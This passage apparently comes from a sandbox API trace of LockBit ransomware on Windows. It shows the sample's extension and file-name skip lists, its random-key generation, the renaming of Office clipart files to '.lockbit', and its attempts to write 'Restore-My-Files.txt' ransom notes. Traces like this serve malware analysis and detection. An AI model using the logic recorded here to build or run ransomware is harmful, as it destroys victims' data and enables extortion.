lpString2="BS00445_.WMF") returned -1 [0109.604] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00445_.WMF") returned -1 [0109.604] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00445_.WMF") returned 1 [0109.604] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00445_.WMF") returned 1 [0109.604] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.604] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned=".WMF" [0109.604] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.604] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.605] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.605] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.lockbit") returned 72 [0109.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.606] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.606] malloc (_Size=0x40068) returned 0x3e70008 [0109.606] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3796) returned 1 [0109.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.608] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0109.614] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.614] malloc (_Size=0xa6) returned 0x77d800 [0109.614] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.614] free (_Block=0x77d800) [0109.615] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.615] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.615] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.615] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00453_.WMF", cAlternateFileName="")) returned 1 [0109.615] lstrcmpiW (lpString1=".", lpString2="BS00453_.WMF") returned -1 [0109.615] lstrcmpiW (lpString1="..", lpString2="BS00453_.WMF") returned -1 [0109.615] PathFindExtensionW (pszPath="BS00453_.WMF") returned=".WMF" [0109.615] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.615] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.616] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.616] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.617] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00453_.WMF") returned 1 [0109.617] lstrcmpiW (lpString1="ntldr", lpString2="BS00453_.WMF") returned 1 [0109.617] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00453_.WMF") returned 1 [0109.617] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00453_.WMF") returned -1 [0109.617] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00453_.WMF") returned -1 [0109.617] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00453_.WMF") returned 1 [0109.617] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00453_.WMF") returned 1 [0109.618] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.618] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned=".WMF" [0109.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.618] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.619] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.619] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.lockbit") returned 72 [0109.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.620] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.620] malloc (_Size=0x40068) returned 0x3d70048 [0109.620] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2436) returned 1 [0109.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0109.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0109.621] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.629] malloc (_Size=0xa6) returned 0x77d800 [0109.629] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.630] free (_Block=0x77d800) [0109.630] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.630] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.630] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.630] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba86700, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ba86700, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01080_.WMF", cAlternateFileName="")) returned 1 [0109.630] lstrcmpiW (lpString1=".", lpString2="BS01080_.WMF") returned -1 [0109.630] lstrcmpiW (lpString1="..", lpString2="BS01080_.WMF") returned -1 [0109.630] PathFindExtensionW (pszPath="BS01080_.WMF") returned=".WMF" [0109.630] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.630] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.631] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.632] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.632] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01080_.WMF") returned 1 [0109.633] lstrcmpiW (lpString1="ntldr", lpString2="BS01080_.WMF") returned 1 [0109.633] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01080_.WMF") returned 1 [0109.633] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01080_.WMF") returned -1 [0109.633] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01080_.WMF") returned -1 [0109.633] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01080_.WMF") returned 1 [0109.633] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01080_.WMF") returned 1 [0109.633] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.633] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned=".WMF" [0109.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.633] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.633] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.634] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.634] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.lockbit") returned 72 [0109.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.635] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.635] malloc (_Size=0x40068) returned 0x3db00b8 [0109.635] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=2732) returned 1 [0109.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0109.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0109.637] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.648] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.648] malloc (_Size=0xa6) returned 0x77d800 [0109.648] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.649] free (_Block=0x77d800) [0109.649] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.649] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.649] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.649] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d186600, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d186600, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01603_.WMF", 